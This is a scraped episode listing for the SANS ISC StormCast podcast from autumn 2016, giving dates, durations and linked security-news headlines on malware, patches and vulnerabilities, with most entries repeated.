Hancitor Maldoc Bypasses Application Whitelisting https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Bypasses+Application+Whitelisting/21683/ Microsoft Extends EMET Support Deadline https://blogs.technet.microsoft.com/srd/2016/11/03/beyond-emet/ Wifi Based IMSI Catcher https://www.blackhat.com/docs/eu-16/materials/eu-16-OHanlon-WiFi-IMSI-Catcher.pdf
11/7/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, November 7th 2016

Hancitor Maldoc Bypasses Application Whitelisting https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Bypasses+Application+Whitelisting/21683/ Microsoft Extends EMET Support Deadline https://blogs.technet.microsoft.com/srd/2016/11/03/beyond-emet/ Wifi Based IMSI Catcher https://www.blackhat.com/docs/eu-16/materials/eu-16-OHanlon-WiFi-IMSI-Catcher.pdf
11/7/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, November 4th 2016

Reconstruct Binaries Sent via Telnet https://isc.sans.edu/forums/diary/Extracting+Malware+Transmitted+Via+Telnet/21673/ Wix.com DOM Based XSS https://www.contrastsecurity.com/security-influencers/dom-xss-in-wix.com DNS Based Mail Security https://nccoe.nist.gov/projects/building_blocks/secured_email Web of Trust Plugin Released Anonymized User Data https://www.mywot.com/en/forum/70396--virus-spyware-do-not-install-uninstall-as-soon-as-possible
11/3/20166 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, November 4th 2016

Reconstruct Binaries Sent via Telnet https://isc.sans.edu/forums/diary/Extracting+Malware+Transmitted+Via+Telnet/21673/ Wix.com DOM Based XSS https://www.contrastsecurity.com/security-influencers/dom-xss-in-wix.com DNS Based Mail Security https://nccoe.nist.gov/projects/building_blocks/secured_email Web of Trust Plugin Released Anonymized User Data https://www.mywot.com/en/forum/70396--virus-spyware-do-not-install-uninstall-as-soon-as-possible
11/3/20166 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, November 3rd 2016

Exchange Web Service Two-Factor Authentication Bypass http://www.blackhillsinfosec.com/?p=5396 Barracuda DoS Disrupts Mail Delivery http://status.barracuda.com Targobank Looses Account Data After Maintenance http://www.spiegel.de/wirtschaft/service/targobank-kunden-fehlt-geld-auf-dem-konto-it-probleme-a-1119434.html (german only) Ouch! Security Awareness Newsletter http://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201611_en.pdf
11/3/20165 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, November 3rd 2016

Exchange Web Service Two-Factor Authentication Bypass http://www.blackhillsinfosec.com/?p=5396 Barracuda DoS Disrupts Mail Delivery http://status.barracuda.com Targobank Looses Account Data After Maintenance http://www.spiegel.de/wirtschaft/service/targobank-kunden-fehlt-geld-auf-dem-konto-it-probleme-a-1119434.html (german only) Ouch! Security Awareness Newsletter http://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201611_en.pdf
11/3/20165 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, November 2nd 2016

Malvertising On Google AdWords Targeting macOS Users http://blog.cylance.com/malvertising-on-google-adwords-targeting-macos-users Microsoft Response to Google Privilege Escalation Disclosure https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/ Memcached Remote Code Execution Vulnerabilities http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html SAP Vulnerability Details Released https://erpscan.com/press-center/blog/0-day-sap-vulnerability-published-heres-can/
11/2/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, November 2nd 2016

Malvertising On Google AdWords Targeting macOS Users http://blog.cylance.com/malvertising-on-google-adwords-targeting-macos-users Microsoft Response to Google Privilege Escalation Disclosure https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/ Memcached Remote Code Execution Vulnerabilities http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html SAP Vulnerability Details Released https://erpscan.com/press-center/blog/0-day-sap-vulnerability-published-heres-can/
11/2/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, November 1st 2016

snapshot.ps1 DFIR Capture https://isc.sans.edu/forums/diary/SEC505+DFIR+capture+script+snapshotps1/21659/ Predicting Domain Reputation http://www.icir.org/vern/papers/predator-ccs16.pdf Mozilla Removing Battery Status API For Privacy Reasons https://www.fxsitecompat.com/en-CA/docs/2016/battery-status-api-has-been-removed/ Windows Privilege Escalation 0-day Actively Exploited https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
11/1/20165 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, November 1st 2016

snapshot.ps1 DFIR Capture https://isc.sans.edu/forums/diary/SEC505+DFIR+capture+script+snapshotps1/21659/ Predicting Domain Reputation http://www.icir.org/vern/papers/predator-ccs16.pdf Mozilla Removing Battery Status API For Privacy Reasons https://www.fxsitecompat.com/en-CA/docs/2016/battery-status-api-has-been-removed/ Windows Privilege Escalation 0-day Actively Exploited https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
11/1/20165 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, October 31st 2016

Volatility Bot: Automated Memory Analysis https://isc.sans.edu/forums/diary/Volatility+Bot+Automated+Memory+Analysis/21655/ 911 System Fragility Exposed in Accidental DoS Attacks https://staging.mcso.org/Multimedia/PressRelease/911%20Cyber%20Attack.pdf Vulnerability in Mirai Botnet https://www.invincealabs.com/blog/2016/10/killing-mirai/ XNU Kernel (iOS/macOS) task_t Privildge Escalation https://googleprojectzero.blogspot.de/2016/10/taskt-considered-harmful.html
10/31/20166 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, October 31st 2016

Volatility Bot: Automated Memory Analysis https://isc.sans.edu/forums/diary/Volatility+Bot+Automated+Memory+Analysis/21655/ 911 System Fragility Exposed in Accidental DoS Attacks https://staging.mcso.org/Multimedia/PressRelease/911%20Cyber%20Attack.pdf Vulnerability in Mirai Botnet https://www.invincealabs.com/blog/2016/10/killing-mirai/ XNU Kernel (iOS/macOS) task_t Privildge Escalation https://googleprojectzero.blogspot.de/2016/10/taskt-considered-harmful.html
10/31/20166 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, October 28th 2016

Small Changes to Ransomware E-Mails May Fool Some Mail Filters https://isc.sans.edu/forums/diary/Your+Bill+Is+Not+Overdue+today/21647/ Microsoft / Google Release Browser Updates to Address Flash Vulnerablity https://technet.microsoft.com/en-us/library/security/ms16-128.aspx https://googlechromereleases.blogspot.com Social Media "Support" Phishing https://www.proofpoint.com/us/corporate-blog/post/cybercriminals-spoof-every-major-bank-masquerade-branded-customer-service-twitter-accounts Path Traversal Vulnerablity in gnu tar https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt Podcast Survey https://dshield.typeform.com/to/lVgHr5
10/27/20166 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, October 28th 2016

Small Changes to Ransomware E-Mails May Fool Some Mail Filters https://isc.sans.edu/forums/diary/Your+Bill+Is+Not+Overdue+today/21647/ Microsoft / Google Release Browser Updates to Address Flash Vulnerablity https://technet.microsoft.com/en-us/library/security/ms16-128.aspx https://googlechromereleases.blogspot.com Social Media "Support" Phishing https://www.proofpoint.com/us/corporate-blog/post/cybercriminals-spoof-every-major-bank-masquerade-branded-customer-service-twitter-accounts Path Traversal Vulnerablity in gnu tar https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt Podcast Survey https://dshield.typeform.com/to/lVgHr5
10/27/20166 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, October 27th 2016

Adobe Releases Emergency Patch For Flash https://isc.sans.edu/forums/diary/Critical+Flash+Player+Update+APSB1636/21643/ Mobile Pwn2Own Writeup http://blog.trendmicro.com/results-mobile-pwn2own-2016/ Mozilla Will Stick With Blacklisting Startcom/WoSign https://blog.mozilla.org/security/2016/10/24/distrusting-new-wosign-and-startcom-certificates/ Joomla Exploit Released https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2#.b8gks1jar Google Spreadsheet Vulnerability https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hijacking_allows_data_theft.html
10/26/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, October 27th 2016

Adobe Releases Emergency Patch For Flash https://isc.sans.edu/forums/diary/Critical+Flash+Player+Update+APSB1636/21643/ Mobile Pwn2Own Writeup http://blog.trendmicro.com/results-mobile-pwn2own-2016/ Mozilla Will Stick With Blacklisting Startcom/WoSign https://blog.mozilla.org/security/2016/10/24/distrusting-new-wosign-and-startcom-certificates/ Joomla Exploit Released https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2#.b8gks1jar Google Spreadsheet Vulnerability https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hijacking_allows_data_theft.html
10/26/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, October 26th 2016

Joomla Fixes Two Critical Vulnerablities; https://www.joomla.org/announcements/release-news/5678-joomla-3-6-4-released.html Letsencrypt Domain Verification Problem https://dan.enigmabridge.com/lets-encrypts-vulnerability-as-a-feature-authz-reuse-and-eternal-account-key/ New Locky Variants: Pumpkin Locky http://blog.talosintel.com/2016/10/pumpkin-locky.html Pagers still in use for Critical Infrastructure http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/industrial-plant-beepers-leaking-secrets
10/26/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, October 26th 2016

Joomla Fixes Two Critical Vulnerablities; https://www.joomla.org/announcements/release-news/5678-joomla-3-6-4-released.html Letsencrypt Domain Verification Problem https://dan.enigmabridge.com/lets-encrypts-vulnerability-as-a-feature-authz-reuse-and-eternal-account-key/ New Locky Variants: Pumpkin Locky http://blog.talosintel.com/2016/10/pumpkin-locky.html Pagers still in use for Critical Infrastructure http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/industrial-plant-beepers-leaking-secrets
10/26/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, October 25th 2016

Updates For iOS, MacOS, Safari https://support.apple.com/en-us/HT201222 LTE Intercept Vulnerability http://www.theregister.co.uk/2016/10/23/every_lte_call_text_can_be_intercepted_blacked_out_hacker_finds/ Rowhammer Exploit Demonstrated Against Android https://www.vusec.net/projects/drammer/
10/25/20166 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, October 25th 2016

Updates For iOS, MacOS, Safari https://support.apple.com/en-us/HT201222 LTE Intercept Vulnerability http://www.theregister.co.uk/2016/10/23/every_lte_call_text_can_be_intercepted_blacked_out_hacker_finds/ Rowhammer Exploit Demonstrated Against Android https://www.vusec.net/projects/drammer/
10/25/20166 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, October 24th 2016

ISC Briefing: Large DDoS Attack Against Dyn https://isc.sans.edu/forums/diary/ISC+Briefing+Large+DDoS+Attack+Against+Dyn/21627/ TCP Port 4786: Cisco Memory Leak Vulnerability https://isc.sans.edu/forums/diary/Request+for+Packets+TCP+4786+CVE20166385/21625/ Dirty Cow PoC Exploits Available https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs To register for today's SANS Technology Institute's Professional Lecture Series, pleaes e-mail [email protected]
10/23/20167 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, October 24th 2016

ISC Briefing: Large DDoS Attack Against Dyn https://isc.sans.edu/forums/diary/ISC+Briefing+Large+DDoS+Attack+Against+Dyn/21627/ TCP Port 4786: Cisco Memory Leak Vulnerability https://isc.sans.edu/forums/diary/Request+for+Packets+TCP+4786+CVE20166385/21625/ Dirty Cow PoC Exploits Available https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs To register for today's SANS Technology Institute's Professional Lecture Series, pleaes e-mail [email protected]
10/23/20167 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, October 21st 2016

NanoCore RAT Malspam Update https://isc.sans.edu/forums/diary/Malspam+delivers+NanoCore+RAT/21615/ Dirty Cow Privilege Escalation Flaw https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13 Lexmark Markvision Enterprise Application Vulnerability https://www.digitaldefense.com/blog-zero-day-lexmark-markvision/ WebRTC Security Overview https://webrtc-security.github.io UPnP Scanner https://www.tenable.com/blog/do-you-know-where-your-upnp-is
10/20/20166 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, October 21st 2016

NanoCore RAT Malspam Update https://isc.sans.edu/forums/diary/Malspam+delivers+NanoCore+RAT/21615/ Dirty Cow Privilege Escalation Flaw https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13 Lexmark Markvision Enterprise Application Vulnerability https://www.digitaldefense.com/blog-zero-day-lexmark-markvision/ WebRTC Security Overview https://webrtc-security.github.io UPnP Scanner https://www.tenable.com/blog/do-you-know-where-your-upnp-is
10/20/20166 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, October 20th 2016

Spam Delivered Via .ICS Files https://isc.sans.edu/forums/diary/Spam+Delivered+via+ICS+Files/21611/ Comodo OCR Errors Leads to SSL Certificate Verification Issues https://heise.de/-3354229 (german only) Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html Images Used to Exfiltrate CC Numbers From Web Stores https://blog.sucuri.net/2016/10/magento-credit-card-swiper-exports-image.html
10/19/20165 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, October 20th 2016

Spam Delivered Via .ICS Files https://isc.sans.edu/forums/diary/Spam+Delivered+via+ICS+Files/21611/ Comodo OCR Errors Leads to SSL Certificate Verification Issues https://heise.de/-3354229 (german only) Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html Images Used to Exfiltrate CC Numbers From Web Stores https://blog.sucuri.net/2016/10/magento-credit-card-swiper-exports-image.html
10/19/20165 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, October 19th 2016

SSL Client Hellos Soliciting SSH Banners from HAProxy https://isc.sans.edu/forums/diary/OpenSSH+Protocol+Mismatch+In+Response+to+SSL+Client+Hello/21609/ Dyre is Back as Trickbot http://www.threatgeek.com/2016/10/trickbot-the-dyre-connection.html How Stolen iPhones Are Unlocked https://www.linkedin.com/pulse/sin-card-how-criminals-unlocked-stolen-iphone-6s-renato-marinho?trk=pulse_spock-articles
10/19/20166 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, October 19th 2016

SSL Client Hellos Soliciting SSH Banners from HAProxy https://isc.sans.edu/forums/diary/OpenSSH+Protocol+Mismatch+In+Response+to+SSL+Client+Hello/21609/ Dyre is Back as Trickbot http://www.threatgeek.com/2016/10/trickbot-the-dyre-connection.html How Stolen iPhones Are Unlocked https://www.linkedin.com/pulse/sin-card-how-criminals-unlocked-stolen-iphone-6s-renato-marinho?trk=pulse_spock-articles
10/19/20166 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, October 18th 2016

Mozilla Users Reach 50% Https https://twitter.com/0xjosh/status/786971412959420424/photo/1 Retrieving LastPass Passwords From Memory https://techanarchy.net/2016/10/extracting-lastpass-site-credentials-from-memory/ Yahoo MITM Due To Weak Crossdomain.xml Configuration https://github.com/JordanMilne/YMail-Pineapple
10/17/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, October 18th 2016

Mozilla Users Reach 50% Https https://twitter.com/0xjosh/status/786971412959420424/photo/1 Retrieving LastPass Passwords From Memory https://techanarchy.net/2016/10/extracting-lastpass-site-credentials-from-memory/ Yahoo MITM Due To Weak Crossdomain.xml Configuration https://github.com/JordanMilne/YMail-Pineapple
10/17/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, October 17th 2016

PseudoDakrleech Uses Rig Exploit Kit to Spread Cerber https://isc.sans.edu/forums/diary/pseudoDarkleech+Rig+EK/21595/ Decoder.xls to Decode Word Malicious Macro https://isc.sans.edu/forums/diary/Analyzing+Office+Maldocs+With+Decoderxls/21601/ Auditing SSH Servers https://github.com/arthepsy/ssh-audit How Not To User HTML Purifier https://devwerks.net/blog/16/how-not-to-use-html-purifier/
10/16/20165 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, October 17th 2016

PseudoDakrleech Uses Rig Exploit Kit to Spread Cerber https://isc.sans.edu/forums/diary/pseudoDarkleech+Rig+EK/21595/ Decoder.xls to Decode Word Malicious Macro https://isc.sans.edu/forums/diary/Analyzing+Office+Maldocs+With+Decoderxls/21601/ Auditing SSH Servers https://github.com/arthepsy/ssh-audit How Not To User HTML Purifier https://devwerks.net/blog/16/how-not-to-use-html-purifier/
10/16/20165 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, October 14th 2016

Mount Docker Filesystems with docker-mount.py https://isc.sans.edu/forums/diary/New+tool+dockermountpy/21589/ Global Sign OCSP Mess Up Invalidates Countless Certs https://downloads.globalsign.com/acton/fs/blocks/showLandingPage/a/2674/p/p-008f/t/page/fm/0 Cisco Releases LockyDump http://blog.talosintel.com/2016/10/lockydump.html Google Updates Chrome https://googlechromereleases.blogspot.com/2016/10/stable-channel-update-for-desktop.html DXXD Ransomware Infected un-mapped Shares http://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/
10/14/20165 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, October 14th 2016

Mount Docker Filesystems with docker-mount.py https://isc.sans.edu/forums/diary/New+tool+dockermountpy/21589/ Global Sign OCSP Mess Up Invalidates Countless Certs https://downloads.globalsign.com/acton/fs/blocks/showLandingPage/a/2674/p/p-008f/t/page/fm/0 Cisco Releases LockyDump http://blog.talosintel.com/2016/10/lockydump.html Google Updates Chrome https://googlechromereleases.blogspot.com/2016/10/stable-channel-update-for-desktop.html DXXD Ransomware Infected un-mapped Shares http://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/
10/14/20165 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, October 13th 2016

WiFi Still Remains a Good Attack Vector https://isc.sans.edu/forums/diary/WiFi+Still+Remains+a+Good+Attack+Vector/21583/ AVTECH IP Camera Vulnerabilities http://seclists.org/bugtraq/2016/Oct/26 SAP Patches 3 Year Old Bug in P4 https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/ 1024 bit DSA Keys Factored https://eprint.iacr.org/2016/961.pdf
10/12/20166 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, October 13th 2016

WiFi Still Remains a Good Attack Vector https://isc.sans.edu/forums/diary/WiFi+Still+Remains+a+Good+Attack+Vector/21583/ AVTECH IP Camera Vulnerabilities http://seclists.org/bugtraq/2016/Oct/26 SAP Patches 3 Year Old Bug in P4 https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/ 1024 bit DSA Keys Factored https://eprint.iacr.org/2016/961.pdf
10/12/20166 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, October 12th 2016

Microsoft and Adobe Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-10-11 https://helpx.adobe.com/security/products/acrobat/apsb16-33.html http://www.minixforum.com/threads/neo-z64w-doesnt-start-anymore-after-windows-10-update-help.14122/ Review of Browsers SSL Failures https://docs.google.com/document/d/1b7lenmn5XO06QohaJzVffnJxjXjY1rD70wg34gfuxRo/edit#heading=h.w6vk76mv9e6n New Malware Targeting SWIFT Users http://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
10/11/20165 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, October 12th 2016

Microsoft and Adobe Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-10-11 https://helpx.adobe.com/security/products/acrobat/apsb16-33.html http://www.minixforum.com/threads/neo-z64w-doesnt-start-anymore-after-windows-10-update-help.14122/ Review of Browsers SSL Failures https://docs.google.com/document/d/1b7lenmn5XO06QohaJzVffnJxjXjY1rD70wg34gfuxRo/edit#heading=h.w6vk76mv9e6n New Malware Targeting SWIFT Users http://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
10/11/20165 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, October 11th 2016

Radare's Rehash Utility CAn calculate File Entropy https://isc.sans.edu/forums/diary/Radare2+rahash2/21577/ Spoofing IPs Still works https://idea.popcount.org/2016-09-20-strange-loop---ip-spoofing/ EU Commission Plants IoT Labeling http://www.euractiv.com/section/innovation-industry/news/commission-plans-cybersecurity-rules-for-internet-connected-machines/
10/11/20163 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, October 11th 2016

Radare's Rehash Utility CAn calculate File Entropy https://isc.sans.edu/forums/diary/Radare2+rahash2/21577/ Spoofing IPs Still works https://idea.popcount.org/2016-09-20-strange-loop---ip-spoofing/ EU Commission Plants IoT Labeling http://www.euractiv.com/section/innovation-industry/news/commission-plans-cybersecurity-rules-for-internet-connected-machines/
10/11/20163 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, October 10th 2016

First Hurricane Matthew Phish Impersonating Stripe https://isc.sans.edu/forums/diary/First+Hurricane+Matthew+related+Phish/21571/ Samsung Galaxy S6 "KNOXOut" Vulnerability http://media.wix.com/ugd/4e84e6_668d564cc447434a9a8fda3c13a63f6a.pdf Windows 10 Anniversary Edition Improves IE 10 XSS Protection http://mksben.l0.cm/2016/10/xss-via-referrer.html
10/9/20165 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, October 10th 2016

First Hurricane Matthew Phish Impersonating Stripe https://isc.sans.edu/forums/diary/First+Hurricane+Matthew+related+Phish/21571/ Samsung Galaxy S6 "KNOXOut" Vulnerability http://media.wix.com/ugd/4e84e6_668d564cc447434a9a8fda3c13a63f6a.pdf Windows 10 Anniversary Edition Improves IE 10 XSS Protection http://mksben.l0.cm/2016/10/xss-via-referrer.html
10/9/20165 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, October 7th 2016

More Honeypot Fun https://isc.sans.edu/forums/diary/Checking+my+honeypot+day/21561/ OS X Webcam Exploit https://objective-see.com/products/oversight.html iOS 10 Private Browsing https://www.intaforensics.com/2016/09/30/ios-10-private-browsing-how-private-is-it/ Hacked Steam Accounts Used to Spread Malware http://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/ Please Report Any Hurricane Matthew Related Malware/Scams https://isc.sans.edu/contact.html
10/7/20165 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, October 7th 2016

More Honeypot Fun https://isc.sans.edu/forums/diary/Checking+my+honeypot+day/21561/ OS X Webcam Exploit https://objective-see.com/products/oversight.html iOS 10 Private Browsing https://www.intaforensics.com/2016/09/30/ios-10-private-browsing-how-private-is-it/ Hacked Steam Accounts Used to Spread Malware http://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/ Please Report Any Hurricane Matthew Related Malware/Scams https://isc.sans.edu/contact.html
10/7/20165 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, October 6th 2016

Securing the Human Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201610_en.pdf "Security Fatigue" https://www.nist.gov/news-events/news/2016/10/security-fatigue-can-cause-computer-users-feel-hopeless-and-act-recklessly "Selfi Pay" Facial Recognition http://www.theregister.co.uk/2016/10/05/mastercard_selfie_pay/ "MarsJoke" Ransomware Decrypted https://threatpost.com/researchers-break-marsjoke-ransomware-encryption/121022/
10/6/20165 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, October 6th 2016

Securing the Human Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201610_en.pdf "Security Fatigue" https://www.nist.gov/news-events/news/2016/10/security-fatigue-can-cause-computer-users-feel-hopeless-and-act-recklessly "Selfi Pay" Facial Recognition http://www.theregister.co.uk/2016/10/05/mastercard_selfie_pay/ "MarsJoke" Ransomware Decrypted https://threatpost.com/researchers-break-marsjoke-ransomware-encryption/121022/
10/6/20165 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, October 5th 2016

SSL Requests to Non-SSL Web Servers https://isc.sans.edu/forums/diary/SSL+Requests+to+nonSSL+HTTP+Servers/21551/ Insulin Pump Vulnerablities https://community.rapid7.com/community/infosec/blog/2016/10/04/r7-2016-07-multiple-vulnerabilities-in-animas-onetouch-ping-insulin-pump SSH Konami Codes http://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences Cyber Security Awareness Month https://securingthehuman.sans.org/blog/2016/10/02/week01-kicking-off-ncsam/ OpenJPEG Flaw http://blog.talosintel.com/2016/09/vulnerability-spotlight-jpeg2000.html
10/5/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, October 5th 2016

SSL Requests to Non-SSL Web Servers https://isc.sans.edu/forums/diary/SSL+Requests+to+nonSSL+HTTP+Servers/21551/ Insulin Pump Vulnerablities https://community.rapid7.com/community/infosec/blog/2016/10/04/r7-2016-07-multiple-vulnerabilities-in-animas-onetouch-ping-insulin-pump SSH Konami Codes http://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences Cyber Security Awareness Month https://securingthehuman.sans.org/blog/2016/10/02/week01-kicking-off-ncsam/ OpenJPEG Flaw http://blog.talosintel.com/2016/09/vulnerability-spotlight-jpeg2000.html
10/5/20165 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, October 4th 2016

Password Buddies https://isc.sans.edu/forums/diary/Password+Buddies+A+Better+Way+To+Reset+Passwords/21547/ iMessage Data Leakage http://rsmck.co.uk/blog/imessage-preview/ Exploiting HP Thin Client http://blog.malerisch.net/2016/10/pwning-thin-client-in-less-two-minutes2-cve2016-2246.html
10/4/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, October 4th 2016

Password Buddies https://isc.sans.edu/forums/diary/Password+Buddies+A+Better+Way+To+Reset+Passwords/21547/ iMessage Data Leakage http://rsmck.co.uk/blog/imessage-preview/ Exploiting HP Thin Client http://blog.malerisch.net/2016/10/pwning-thin-client-in-less-two-minutes2-cve2016-2246.html
10/4/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, October 3rd 2016

The Short Life of a Vulnerable DVR Connected to the Internet https://isc.sans.edu/forums/diary/The+Short+Life+of+a+Vulnerable+DVR+Connected+to+the+Internet/21543/ Another Day, Another Malicious Behaviour https://isc.sans.edu/forums/diary/Another+Day+Another+Malicious+Behaviour/21539/ Capcom's Streetfighter V Anti Cheat Tool Allows Privilege Escalation https://twitter.com/TheWack0lian/status/779397840762245124/photo/1?ref_src=twsrc%5Etfw Apple Joins Mozilla In Distrusting WoSign https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/lWJ1zdUJPLI "Footprints" Browser Extension Demonstrate Unmasking User's Idendity https://footprints.stanford.edu
10/3/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, October 3rd 2016

The Short Life of a Vulnerable DVR Connected to the Internet https://isc.sans.edu/forums/diary/The+Short+Life+of+a+Vulnerable+DVR+Connected+to+the+Internet/21543/ Another Day, Another Malicious Behaviour https://isc.sans.edu/forums/diary/Another+Day+Another+Malicious+Behaviour/21539/ Capcom's Streetfighter V Anti Cheat Tool Allows Privilege Escalation https://twitter.com/TheWack0lian/status/779397840762245124/photo/1?ref_src=twsrc%5Etfw Apple Joins Mozilla In Distrusting WoSign https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/lWJ1zdUJPLI "Footprints" Browser Extension Demonstrate Unmasking User's Idendity https://footprints.stanford.edu
10/3/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, September 30th 2016

Turning the lights off with SNMP https://isc.sans.edu/forums/diary/SNMP+Pwn3ge/21533/ Yahoo! Anwers Used in Command and Control Networks http://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/ Dlink Router Includes Stupid Simple UDP Backdoor https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html Hikvision XXE Vulnerability https://medium.com/@iraklis/an-unlikely-xxe-in-hikvisions-remote-access-camera-cloud-d57faf99620f#.qukzihoew
9/30/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, September 30th 2016

Turning the lights off with SNMP https://isc.sans.edu/forums/diary/SNMP+Pwn3ge/21533/ Yahoo! Anwers Used in Command and Control Networks http://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/ Dlink Router Includes Stupid Simple UDP Backdoor https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html Hikvision XXE Vulnerability https://medium.com/@iraklis/an-unlikely-xxe-in-hikvisions-remote-access-camera-cloud-d57faf99620f#.qukzihoew
9/30/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, September 29th 2016

Rig Exploit Kit Used to Spread Locky Ransomware https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+from+the+Afraidgate+Campaign/21531/ Facebook Releases osquery for Windows https://blog.trailofbits.com/2016/09/27/windows-network-security-now-easier-with-osquery/ Update Cowrie and "New" Default Password used in Internet Wide Scans https://isc.sans.edu/ssh.html?pw=xc3511 BIND Name Server Update https://kb.isc.org/article/AA-01393/74/CVE-2016-2775%3A-A-query-name-which-is-too-long-can-cause-a-segmentation-fault-in-lwresd.html Various Cisco DoS Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=NonCisco#~Vulnerabilities
9/28/20165 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, September 29th 2016

